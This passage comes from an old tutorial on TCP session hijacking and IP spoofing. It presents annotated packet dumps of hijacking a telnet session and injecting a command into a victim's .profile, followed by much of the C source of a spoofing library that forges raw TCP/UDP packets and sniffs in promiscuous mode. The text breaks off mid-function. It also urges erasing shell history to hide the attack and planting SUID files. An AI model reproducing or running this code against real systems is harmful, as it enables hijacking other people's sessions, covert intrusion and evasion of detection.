2238 Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 45 E 00 . 00 . 29 ) B5 . BD . 40 @ 00 . FC . 06 . 1E . 44 D 9D . C1 . 2A * 0B . 9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F6 . 5C \ 82 . 23 # EB . 50 P 18 . 22 " 38 8 C6 . F0 . 00 . 00 . 6C l ~~~~ 3) A simple ACK from host A to B responding to that echo. Because we know this can come, and we know a simple ACK doesn't contain data, we don't need this for SEQ/ACK calculation. TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -A---- Window: 7C00 (data removed because irrelevant) 4) Now we impersonate further data (following packet 1). (S as A -> B) We calculate SEQ/ACK out of packet 1, NOT out of the 'echo' from B, because we have to be as fast as possible, and packet 2 could be slow. We send some backspaces and some enters. To clean up the command line. We will probably still get some error message back from the shell. But we handle that too! (see sourcecode) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F6 FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 45 E 00 . 00 . 32 2 31 1 01 . 00 . 00 . 45 E 06 . 99 . F8 . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # EB . C3 . 4A J 67 g F6 . 50 P 18 . 7C | 00 . AE . F5 . 00 . 00 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 08 . 0A . 0A . 5) This is the echo of our spoofed data. Look at ACK. (B->A) 5C8223F5 = 5C8223EB + 0A (this is how we detect that the spoof was a success) NOTE that at this point the connection is ours, and A's SEQ/ACK numbers are completely f#cked up according to B. TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A67F7 ACK (hex): 5C8223F5 FLAGS: -AP--- Window: 2238 Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 45 E 00 . 00 . 3C < B5 . BE . 40 @ 00 . FC . 06 . 1E . 30 0 9D . C1 . 2A * 0B . 9D . C1 . 45 E 3F ? 00 . 17 . 04 . 10 . C3 . 4A J 67 g F7 . 5C \ 82 . 23 # F5 . 50 P 18 . 22 " 38 8 26 & 7C | 00 . 00 . 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 5E ^ 48 H 0D . 0A . 0D . 0A . 6) Hijack will now try to get on track of SEQ/ACK numbers again, to send the data we want to be executed. NOTE each time a packet 'out of numbering' arrives the host should answer with correct SEQ/ACK, this provides us with the certainty that a lot of packets are going to be send with correct (and not changing) SEQ/ACK nrs. (this is where the mechanism of getting our numbers back straight is based upon) NOTE it's at this point the real TELNET client's session hangs, most people ignore this and re-login after a few secs, accepting the accident as Murphy's law. (Well it *can* happen without any spoofing involved) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-157.193.42.11.23 SEQ (hex): 5C8223EB ACK (hex): C34A67F7 FLAGS: -AP--- Window: 7C00 (data removed because irrelevant) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C8223F5 FLAGS: -A---- Window: 2238 (data removed because irrelevant) 7) We are back on track (or at least hijack is, because this is going very fast). And we fire off our faked bash command. echo "echo HACKED" >> $HOME/.profile TCP Packet ID (from_IP.port-to_IP.port): 166.66.66.1.1040-111.11.11.11.23 SEQ (hex): 5C8223F5 ACK (hex): C34A680B FLAGS: -AP--- Window: 7C00 Packet ID (from_IP.port-to_IP.port): 166.66.66.1-111.11.11.11.23 45 E 00 . 00 . 4D M 31 1 01 . 00 . 00 . 45 E 06 . 99 . DD . 9D . C1 . 45 E 3F ? 9D . C1 . 2A * 0B . 04 . 10 . 00 . 17 . 5C \ 82 . 23 # F5 . C3 . 4A J 68 h 0B . 50 P 18 . 7C | 00 . 5A Z B6 . 00 . 00 . 65 e 63 c 68 h 6F o 20 22 " 65 e 63 c 68 h 6F o 20 48 H 41 A 43 C 4B K 45 E 44 D 22 " 20 3E > 3E > 24 $ 48 H 4F O 4D M 45 E 2F / 2E . 70 p 72 r 6F o 66 f 69 i 6C l 65 e 0A . 00 . 8) now we wait for this data to be confirmed. ACK = 5C8223F5 + 025 (=37 bytes) TCP Packet ID (from_IP.port-to_IP.port): 111.11.11.11.23-166.66.66.1.1040 SEQ (hex): C34A680B ACK (hex): 5C82241A FLAGS: -AP--- Window: 2238 Packet ID (from_IP.port-to_IP.port): 157.193.42.11.23-157.193.69.63.1040 (data removed because irrelevant) 9) The connection runs on. Now you can execute more commands (just stay on track of SEQ/ACK), and even finnish the connection (with the same mechanism of sniper, or with sniper itself... here FIN is recommended). NOTE: here it is important to be in a shell. But if you have been watching someone, and you notice he's always directly going to 'pine' and you can't get inbetween on time. NO PROBS.... just make a cleanup string that cleans up 'pine' and puts you back in the shell. (some control chars, hotkeys, whatever....) NOTE: if you clean up the .sh_history of .bash_history (whatever) this attack is one of the nicest there is. Another advantage above sniffing. NOTE: Noone says you have to make a .rhosts file (rlogin and family might be disabled), you can change permissions, put stuff SUID, put it public, install stuff, mail, etc.. Discussion of the program (numbers correspond with those of 'An Actual Attack'): 1) wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0); Waiting for actual data (PSH is always used for packets containing data in interactive services like TELNET) 2) N/A 3) N/A 4) sp_seq=attack_info.seq+attack_info.datalen; sp_ack=attack_info.ack; transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER, 23,sp_seq,sp_ack,ACK|PSH); We recalculate the sequence number (using SEQ and datalength of packet 1) an we send a spoofed packet with ACK and PSH flag, containing the cleanup data in to_data. 5) while(count<5) { wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==sp_seq+sizeof(to_data)) count=PERSONAL_TOUCH; else count++; }; We wait for a confirmation that our spoofed sequence is accepted. We expect a packet with an ACK set (PSH or not). It should come within 5 packets, we use this limit, because we should be able to handle some previous ACK packets! NOTE we don't check SEQ nrs, because we have no clue of what they are going to be (data might have been send our way, or not). 6) while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; To get back on track, we try to receive 2 ACK packets without data with the same SEQ/ACK. We know enough packets will be send as a response to incorrect packets from the confused host A. This is how we get back on track. NOTE In a case where A completely gave up, simple spoof a packet with incorrect SEQ/ACK to get the correct numbers back. 7) transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); Pretty clear.... 8) while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; and again waiting for confirmation. NOTE after the above attack, hijack had produced the following output: Starting Hijacking demo - Brecht Claerhout 1996 ----------------------------------------------- Takeover phase 1: Stealing connection. Sending Spoofed clean-up data... Waiting for spoof to be confirmed... Phase 1 ended. Takeover phase 2: Getting on track with SEQ/ACK's again Server SEQ: C34A680B (hex) ACK: 5C8223F5 (hex) Phase 2 ended. Takeover phase 3: Sending MY data. Sending evil data. Waiting for evil data to be confirmed... Phase 3 ended. 4.5 Other --------- This list is far from complete, I'm sure you can think of other nice things to do with this information, think, experiment and code! 5. The source code ------------------ ---=[ spoofit.h ]=------------------------------------------------------------ /**************************************************************************/ /* Spoofit.h - Include file for easy creating of spoofed TCP packets */ /* Requires LINUX 1.3.x (or later) Kernel */ /* (illustration for 'A short overview of IP spoofing') */ /* V.1 - Copyright 1996 - Brecht Claerhout */ /* */ /* Purpose - Providing skilled people with a easy to use spoofing source */ /* I used it to be able to write my tools fast and short. */ /* Mind you this is only illustrative and can be easily */ /* optimised. */ /* */ /* Author - Dr_Sp00f (Himself) */ /* Serious advice, comments, statements, greets, always welcome */ /* flames, moronic 3l33t >/dev/null */ /* */ /* Disclaimer - This file is for educational purposes only. I am in */ /* NO way responsible for what you do with this file, */ /* or any damage you or this file causes. */ /* */ /* For whom - People with a little knowledge of TCP/IP, C source code */ /* and general UNIX. Otherwise, please keep your hands of, */ /* and catch up on those things first. */ /* */ /* Limited to - Linux 1.3.X or higher. */ /* If you know a little about your OS, shouldn't be to hard */ /* to port. */ /* */ /* Important note - You might have noticed I use non standard packet */ /* header struct's. How come?? Because I started like */ /* that on Sniffit because I wanted to do the */ /* bittransforms myself. */ /* Well I got so damned used to them, I keep using them, */ /* they are not very different, and not hard to use, so */ /* you'll easily use my struct's without any problem, */ /* this code and the examples show how to use them. */ /* my apologies for this inconvenience. */ /* */ /* None of this code can be used in commercial software. You are free to */ /* use it in any other non-commercial software (modified or not) as long */ /* as you give me the credits for it. You can spread this include file, */ /* but keep it unmodified. */ /* */ /**************************************************************************/ /* */ /* Easiest way to understand this library is to look at the use of it, in */ /* the example progs. */ /* */ /**** Sending packets *****************************************************/ /* */ /* int open_sending (void) */ /* Returns a filedescriptor to the sending socket. */ /* close it with close (int filedesc) */ /* */ /* void transmit_TCP (int sp_fd, char *sp_data, */ /* int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, */ /* char *sp_source, unsigned short sp_source_port, */ /* char *sp_dest,unsigned short sp_dest_port, */ /* unsigned long sp_seq, unsigned long sp_ack, */ /* unsigned short sp_flags) */ /* fire data away in a TCP packet */ /* sp_fd : raw socket filedesc. */ /* sp_data : IP options (you should do the padding) */ /* TCP options (you should do the padding) */ /* data to be transmitted */ /* (NULL is nothing) */ /* note that all is optional, and IP en TCP options are*/ /* not often used. */ /* All data is put after eachother in one buffer. */ /* sp_ipoptlen : length of IP options (in bytes) */ /* sp_tcpoptlen : length of TCP options (in bytes) */ /* sp_datalen : amount of data to be transmitted (bytes) */ /* sp_source : spoofed host that"sends packet" */ /* sp_source_port: spoofed port that "sends packet" */ /* sp_dest : host that should receive packet */ /* sp_dest_port : port that should receive packet */ /* sp_seq : sequence number of packet */ /* sp_ack : ACK of packet */ /* sp_flags : flags of packet (URG,ACK,PSH,RST,SYN,FIN) */ /* */ /* void transmit_UDP (int sp_fd, char *sp_data, */ /* int sp_ipoptlen, int sp_datalen, */ /* char *sp_source, unsigned short sp_source_port, */ /* char *sp_dest, unsigned short sp_dest_port) */ /* fire data away in an UDP packet */ /* sp_fd : raw socket filedesc. */ /* sp_data : IP options */ /* data to be transmitted */ /* (NULL if none) */ /* sp_ipoptlen : length of IP options (in bytes) */ /* sp_datalen : amount of data to be transmitted */ /* sp_source : spoofed host that"sends packet" */ /* sp_source_port: spoofed port that "sends packet" */ /* sp_dest : host that should receive packet */ /* sp_dest_port : port that should receive packet */ /* */ /**** Receiving packets ***************************************************/ /* */ /* int open_receiving (char *rc_device, char mode) */ /* Returns fdesc to a receiving socket */ /* (if mode: IO_HANDLE don't call this twice, global var */ /* rc_fd_abc123 is initialised) */ /* rc_device: the device to use e.g. "eth0", "ppp0" */ /* be sure to change DEV_PREFIX accordingly! */ /* DEV_PREFIX is the length in bytes of the header that */ /* comes with a SOCKET_PACKET due to the network device */ /* mode: 0: normal mode, blocking, (read will wait till packet */ /* comes, mind you, we are in PROMISC mode) */ /* IO_NONBLOCK: non-blocking mode (read will not wait till */ /* usefull for active polling) */ /* IO_HANDLE installs the signal handler that updates SEQ,ACK,..*/ /* (IO_HANDLE is not recommended to use, as it should be */ /* modified according to own use, and it works bad on heavy */ /* traffic continuous monitoring. I needed it once, but left it */ /* in to make you able to have a look at Signal handled IO, */ /* personally I would have removed it, but some thought it */ /* doesn't do any harm anyway, so why remove... ) */ /* (I'm not giving any more info on IO_HANDLE as it is not */ /* needed for the example programs, and interested people can */ /* easilythey figure the code out theirselves.) */ /* (Besides IO_HANDLE can only be called ONCE in a program, */ /* other modes multiple times) */ /* */ /* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start, */ /* unsigned char *proto) */ /* This waits for a packet (mode default) and puts it in buffer or */ /* returns whether there is a pack or not (IO_NONBLOCK). */ /* It returns the packet length if there is one available, else 0 */ /* */ /* int wait_packet(int wp_fd,struct sp_wait_packet *ret_values, */ /* char *wp_source, unsigned short wp_source_port, */ /* char *wp_dest, unsigned short wp_dest_port, */ /* int wp_flags, int wait_time); */ /* wp_fd: a receiving socket (default or IO_NONBLOCK) */ /* ret_values: pointer to a sp_wait_packet struct, that contains SEQ, */ /* ACK, flags, datalen of that packet. For further packet */ /* handling see the examples. */ /* struct sp_wait_packet { */ /* unsigned long seq,ack; */ /* unsigned short flags; */ /* int datalen; */ /* }; */ /* wp_source, wp_source_port : sender of packet */ /* wp_dest, wp_dest_port : receiver of packet */ /* wp_flags: flags that should be present in packet.. (mind you there */ /* could be more present, so check on return) */ /* note: if you don't care about flag, use 0 */ /* wait_time: if not zero, this function will return -1 if no correct */ /* packet has arrived within wait_time secs. */ /* (only works on IO_NONBLOCK socket) */ /* */ /* void set_filter (char *f_source, unsigned short f_source_port, */ /* char *f_dest, unsigned short f_dest_port) */ /* (for use with IO_HANDLE) */ /* Start the program to watch all trafic from source/port to */ /* dest/port. This enables the updating of global data. Can */ /* be called multiple times. */ /* */ /* void close_receiving (void) */ /* When opened a IO_HANDLE mode receiving socket close it with */ /* this. */ /* */ /**** Global DATA (IO_HANDLE mode) ****************************************/ /* */ /* When accessing global data, copy the values to local vars and then use */ /* them. Reduce access time to a minimum. */ /* Mind you use of this is very limited, if you are a novice on IO, just */ /* ignore it, the other functions are good enough!). If not, rewrite the */ /* handler for your own use... */ /* */ /* sig_atomic_t SP_DATA_BUSY */ /* Put this on NON-ZERO when accesing global data. Incoming */ /* packets will be ignored then, data can not be overwritten. */ /* */ /* unsigned long int CUR_SEQ, CUR_ACK; */ /* Last recorded SEQ and ACK number of the filtered "stream". */ /* Before accessing this data set SP_DATA_BUSY non-zero, */ /* afterward set it back to zero. */ /* */ /* unsigned long int CUR_COUNT; */ /* increased everytime other data is updated */ /* */ /* unsigned int CUR_DATALEN; */ /* Length of date in last TCP packet */ /* */ /**************************************************************************/ #include "sys/socket.h" /* includes, what would we do without them */ #include "netdb.h" #include "stdlib.h" #include "unistd.h" #include "stdio.h" #include "errno.h" #include "netinet/in.h" #include "netinet/ip.h" #include "linux/if.h" #include "sys/ioctl.h" #include "sys/types.h" #include "signal.h" #include "fcntl.h" #undef DEBUG #define IP_VERSION 4 /* keep y'r hands off... */ #define MTU 1500 #define IP_HEAD_BASE 20 /* using fixed lengths to send */ #define TCP_HEAD_BASE 20 /* no options etc... */ #define UDP_HEAD_BASE 8 /* Always fixed */ #define IO_HANDLE 1 #define IO_NONBLOCK 2 int DEV_PREFIX = 9999; sig_atomic_t WAIT_PACKET_WAIT_TIME=0; /**** IO_HANDLE ************************************************************/ int rc_fd_abc123; sig_atomic_t RC_FILTSET=0; char rc_filter_string[50]; /* x.x.x.x.p-y.y.y.y.g */ sig_atomic_t SP_DATA_BUSY=0; unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0; unsigned int CUR_DATALEN; unsigned short CUR_FLAGS; /***************************************************************************/ struct sp_wait_packet { unsigned long seq,ack; unsigned short flags; int datalen; }; /* Code from Sniffit - BTW my own program.... no copyright violation here */ #define URG 32 /* TCP flags */ #define ACK 16 #define PSH 8 #define RST 4 #define SYN 2 #define FIN 1 struct PACKET_info { int len, datalen; unsigned long int seq_nr, ACK_nr; u_char FLAGS; }; struct IP_header /* The IPheader (without options) */ { unsigned char verlen, type; unsigned short length, ID, flag_offset; unsigned char TTL, protocol; unsigned short checksum; unsigned long int source, destination; }; struct TCP_header /* The TCP header (without options) */ { unsigned short source, destination; unsigned long int seq_nr, ACK_nr; unsigned short offset_flag, window, checksum, urgent; }; struct UDP_header /* The UDP header */ { unsigned short source, destination; unsigned short length, checksum; }; struct pseudo_IP_header /* The pseudo IP header (checksum calc) */ { unsigned long int source, destination; char zero_byte, protocol; unsigned short TCP_UDP_len; }; /* data structure for argument passing */ struct sp_data_exchange { int fd; /* Sh!t from transmit_TCP */ char *data; int datalen; char *source; unsigned short source_port; char *dest; unsigned short dest_port; unsigned long seq, ack; unsigned short flags; char *buffer; /* work buffer */ int IP_optlen; /* IP options length in bytes */ int TCP_optlen; /* TCP options length in bytes */ }; /**************** all functions *******************************************/ void transmit_TCP (int fd, char *sp_data, int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port, unsigned long sp_seq, unsigned long sp_ack, unsigned short sp_flags); void transmit_UDP (int sp_fd, char *sp_data, int ipoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port); int get_packet (int rc_fd, char *buffer, int *, unsigned char*); int wait_packet(int,struct sp_wait_packet *,char *, unsigned short,char *, unsigned short, int, int); static unsigned long sp_getaddrbyname(char *); int open_sending (void); int open_receiving (char *, char); void close_receiving (void); void sp_send_packet (struct sp_data_exchange *, unsigned char); void sp_fix_TCP_packet (struct sp_data_exchange *); void sp_fix_UDP_packet (struct sp_data_exchange *); void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char); unsigned short in_cksum(unsigned short *, int ); void rc_sigio (int); void set_filter (char *, unsigned short, char *, unsigned short); /********************* let the games commence ****************************/ static unsigned long sp_getaddrbyname(char *sp_name) { struct hostent *sp_he; int i; if(isdigit(*sp_name)) return inet_addr(sp_name); for(i=0;i<100;i++) { if(!(sp_he = gethostbyname(sp_name))) {printf("WARNING: gethostbyname failure!\n"); sleep(1); if(i>=3) /* always a retry here in this kind of application */ printf("Coudn't resolv hostname."), exit(1); } else break; } return sp_he ? *(long*)*sp_he->h_addr_list : 0; } int open_sending (void) { struct protoent *sp_proto; int sp_fd; int dummy=1; /* they don't come rawer */ if ((sp_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1) perror("Couldn't open Socket."), exit(1); #ifdef DEBUG printf("Raw socket ready\n"); #endif return sp_fd; } void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto) { int sp_status; struct sockaddr_in sp_server; struct hostent *sp_help; int HEAD_BASE; /* Construction of destination */ bzero((char *)&sp_server, sizeof(struct sockaddr)); sp_server.sin_family = AF_INET; sp_server.sin_addr.s_addr = inet_addr(sp->dest); if (sp_server.sin_addr.s_addr == (unsigned int)-1) { /* if target not in DOT/number notation */ if (!(sp_help=gethostbyname(sp->dest))) fprintf(stderr,"unknown host %s\n", sp->dest), exit(1); bcopy(sp_help->h_addr, (caddr_t)&sp_server.sin_addr, sp_help->h_length); }; switch(proto) { case 6: HEAD_BASE = TCP_HEAD_BASE; break; /* TCP */ case 17: HEAD_BASE = UDP_HEAD_BASE; break; /* UDP */ default: exit(1); break; }; sp_status = sendto(sp->fd, (char *)(sp->buffer), sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen, 0, (struct sockaddr *)&sp_server,sizeof(struct sockaddr)); if (sp_status < 0 || sp_status != sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen) { if (sp_status < 0) perror("Sendto"), exit(1); printf("hmm... Only transmitted %d of %d bytes.\n", sp_status, sp->datalen+HEAD_BASE); }; #ifdef DEBUG printf("Packet transmitted...\n"); #endif } void sp_fix_IP_packet (struct sp_data_exchange *sp, unsigned char proto) { struct IP_header *sp_help_ip; int HEAD_BASE; switch(proto) { case 6: HEAD_BASE = TCP_HEAD_BASE; break; /* TCP */ case 17: HEAD_BASE = UDP_HEAD_BASE; break; /* UDP */ default: exit(1); break; }; sp_help_ip = (struct IP_header *) (sp->buffer); sp_help_ip->verlen = (IP_VERSION << 4) | ((IP_HEAD_BASE+sp->IP_optlen)/4); sp_help_ip->type = 0; sp_help_ip->length = htons(IP_HEAD_BASE+HEAD_BASE+sp->datalen+sp->IP_optlen+sp->TCP_optlen); sp_help_ip->ID = htons(12545); /* TEST */ sp_help_ip->flag_offset = 0; sp_help_ip->TTL = 69; sp_help_ip->protocol = proto; sp_help_ip->source = sp_getaddrbyname(sp->source); sp_help_ip->destination = sp_getaddrbyname(sp->dest); sp_help_ip->checksum=in_cksum((unsigned short *) (sp->buffer), IP_HEAD_BASE+sp->IP_optlen); #ifdef DEBUG printf("IP header fixed...\n"); #endif } void sp_fix_TCP_packet (struct sp_data_exchange *sp) { char sp_pseudo_ip_construct[MTU]; struct TCP_header *sp_help_tcp; struct pseudo_IP_header *sp_help_pseudo; int i; for(i=0;ibuffer+IP_HEAD_BASE+sp->IP_optlen); sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct; sp_help_tcp->offset_flag = htons( (((TCP_HEAD_BASE+sp->TCP_optlen)/4)<<12) | sp->flags); sp_help_tcp->seq_nr = htonl(sp->seq); sp_help_tcp->ACK_nr = htonl(sp->ack); sp_help_tcp->source = htons(sp->source_port); sp_help_tcp->destination = htons(sp->dest_port); sp_help_tcp->window = htons(0x7c00); /* dummy for now 'wujx' */ sp_help_pseudo->source = sp_getaddrbyname(sp->source); sp_help_pseudo->destination = sp_getaddrbyname(sp->dest); sp_help_pseudo->zero_byte = 0; sp_help_pseudo->protocol = 6; sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+TCP_HEAD_BASE+sp->TCP_optlen); memcpy(sp_pseudo_ip_construct+12, sp_help_tcp, sp->TCP_optlen+sp->datalen+TCP_HEAD_BASE); sp_help_tcp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen); #ifdef DEBUG printf("TCP header fixed...\n"); #endif } void transmit_TCP (int sp_fd, char *sp_data, int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port, unsigned long sp_seq, unsigned long sp_ack, unsigned short sp_flags) { char sp_buffer[1500]; struct sp_data_exchange sp_struct; bzero(sp_buffer,1500); if (sp_ipoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen); if (sp_tcpoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen, sp_data+sp_ipoptlen,sp_tcpoptlen); if (sp_datalen!=0) memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen+sp_tcpoptlen, sp_data+sp_ipoptlen+sp_tcpoptlen,sp_datalen); sp_struct.fd = sp_fd; sp_struct.data = sp_data; sp_struct.datalen = sp_datalen; sp_struct.source = sp_source; sp_struct.source_port = sp_source_port; sp_struct.dest = sp_dest; sp_struct.dest_port = sp_dest_port; sp_struct.seq = sp_seq; sp_struct.ack = sp_ack; sp_struct.flags = sp_flags; sp_struct.buffer = sp_buffer; sp_struct.IP_optlen = sp_ipoptlen; sp_struct.TCP_optlen = sp_tcpoptlen; sp_fix_TCP_packet(&sp_struct); sp_fix_IP_packet(&sp_struct, 6); sp_send_packet(&sp_struct, 6); } void sp_fix_UDP_packet (struct sp_data_exchange *sp) { char sp_pseudo_ip_construct[MTU]; struct UDP_header *sp_help_udp; struct pseudo_IP_header *sp_help_pseudo; int i; for(i=0;ibuffer+IP_HEAD_BASE+sp->IP_optlen); sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct; sp_help_udp->source = htons(sp->source_port); sp_help_udp->destination = htons(sp->dest_port); sp_help_udp->length = htons(sp->datalen+UDP_HEAD_BASE); sp_help_pseudo->source = sp_getaddrbyname(sp->source); sp_help_pseudo->destination = sp_getaddrbyname(sp->dest); sp_help_pseudo->zero_byte = 0; sp_help_pseudo->protocol = 17; sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+UDP_HEAD_BASE); memcpy(sp_pseudo_ip_construct+12, sp_help_udp, sp->datalen+UDP_HEAD_BASE); sp_help_udp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, sp->datalen+12+UDP_HEAD_BASE); #ifdef DEBUG printf("UDP header fixed...\n"); #endif } void transmit_UDP (int sp_fd, char *sp_data, int sp_ipoptlen, int sp_datalen, char *sp_source, unsigned short sp_source_port, char *sp_dest, unsigned short sp_dest_port) { char sp_buffer[1500]; struct sp_data_exchange sp_struct; bzero(sp_buffer,1500); if (sp_ipoptlen!=0) memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen); if (sp_data!=NULL) memcpy(sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen, sp_data+sp_ipoptlen,sp_datalen); sp_struct.fd = sp_fd; sp_struct.data = sp_data; sp_struct.datalen = sp_datalen; sp_struct.source = sp_source; sp_struct.source_port = sp_source_port; sp_struct.dest = sp_dest; sp_struct.dest_port = sp_dest_port; sp_struct.buffer = sp_buffer; sp_struct.IP_optlen = sp_ipoptlen; sp_struct.TCP_optlen = 0; sp_fix_UDP_packet(&sp_struct); sp_fix_IP_packet(&sp_struct, 17); sp_send_packet(&sp_struct, 17); } /* This routine stolen from ping.c -- HAHAHA!*/ unsigned short in_cksum(unsigned short *addr,int len) { register int nleft = len; register unsigned short *w = addr; register int sum = 0; unsigned short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } /************************* Receiving department ****************************/ int open_receiving (char *rc_device, char mode) { int or_fd; struct sigaction rc_sa; int fcntl_flag; struct ifreq ifinfo; char test; /* create snoop socket and set interface promisc */ if ((or_fd = socket(AF_INET, SOCK_PACKET, htons(0x3)))==-1) perror("Couldn't open Socket."), exit(1); strcpy(ifinfo.ifr_ifrn.ifrn_name,rc_device); if(ioctl(or_fd,SIOCGIFFLAGS,&ifinfo)<0) perror("Couldn't get flags."), exit(1); ifinfo.ifr_ifru.ifru_flags |= IFF_PROMISC; if(ioctl(or_fd,SIOCSIFFLAGS,&ifinfo)<0) perror("Couldn't set flags. (PROMISC)"), exit(1); if(mode&IO_HANDLE) { /* install handler */ rc_sa.sa_handler=rc_sigio; /* we don't use signal() */ sigemptyset(&rc_sa.sa_mask); /* because the timing window is */ rc_sa.sa_flags=0; /* too big... */ sigaction(SIGIO,&rc_sa,NULL); } if(fcntl(or_fd,F_SETOWN,getpid())<0) perror("Couldn't set ownership"), exit(1); if(mode&IO_HANDLE) { if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0) perror("Couldn't get FLAGS"), exit(1); if(fcntl(or_fd,F_SETFL,fcntl_flag|FASYNC|FNDELAY)<0) perror("Couldn't set FLAGS"), exit(1); rc_fd_abc123=or_fd; } else { if(mode&IO_NONBLOCK) { if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0) perror("Couldn't get FLAGS"), exit(1); if(fcntl(or_fd,F_SETFL,fcntl_flag|FNDELAY)<0) perror("Couldn't set FLAGS"), exit(1); }; }; #ifdef DEBUG printf("Reading socket ready\n"); #endif return or_fd; } /* returns 0 when no packet read! */ int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,unsigned char *proto) { char help_buffer[MTU]; int pack_len; struct IP_header *gp_IPhead; pack_len = read(rc_fd,help_buffer,1500); if(pack_len<0) { if(errno==EWOULDBLOCK) {pack_len=0;} else {perror("Read error:"); exit(1);} }; if(pack_len>0) { pack_len -= DEV_PREFIX; memcpy(buffer,help_buffer+DEV_PREFIX,pack_len); gp_IPhead = (struct IP_header *) buffer; if(proto != NULL) *proto = gp_IPhead->protocol; if(TCP_UDP_start != NULL) *TCP_UDP_start = (gp_IPhead->verlen & 0xF) << 2; } return pack_len; } void wait_packet_timeout (int sig) { alarm(0); WAIT_PACKET_WAIT_TIME=1; } int wait_packet(int wp_fd,struct sp_wait_packet *ret_values, char *wp_source, unsigned short wp_source_port, char *wp_dest, unsigned short wp_dest_port, int wp_flags, int wait_time) { char wp_buffer[1500]; struct IP_header *wp_iphead; struct TCP_header *wp_tcphead; unsigned long wp_sourcel, wp_destl; int wp_tcpstart; char wp_proto; wp_sourcel=sp_getaddrbyname(wp_source); wp_destl=sp_getaddrbyname(wp_dest); WAIT_PACKET_WAIT_TIME=0; if(wait_time!=0) { signal(SIGALRM,wait_packet_timeout); alarm(wait_time); } while(1) { while(get_packet(wp_fd, wp_buffer, &wp_tcpstart, &wp_proto)<=0) { if (WAIT_PACKET_WAIT_TIME!=0) {alarm(0); return -1;} }; if(wp_proto == 6) { wp_iphead= (struct IP_header *) wp_buffer; wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart); if( (wp_sourcel==wp_iphead->source)&&(wp_destl==wp_iphead->destination) ) { if( (ntohs(wp_tcphead->source)==wp_source_port) && (ntohs(wp_tcphead->destination)==wp_dest_port) ) { if( (wp_flags==0) || 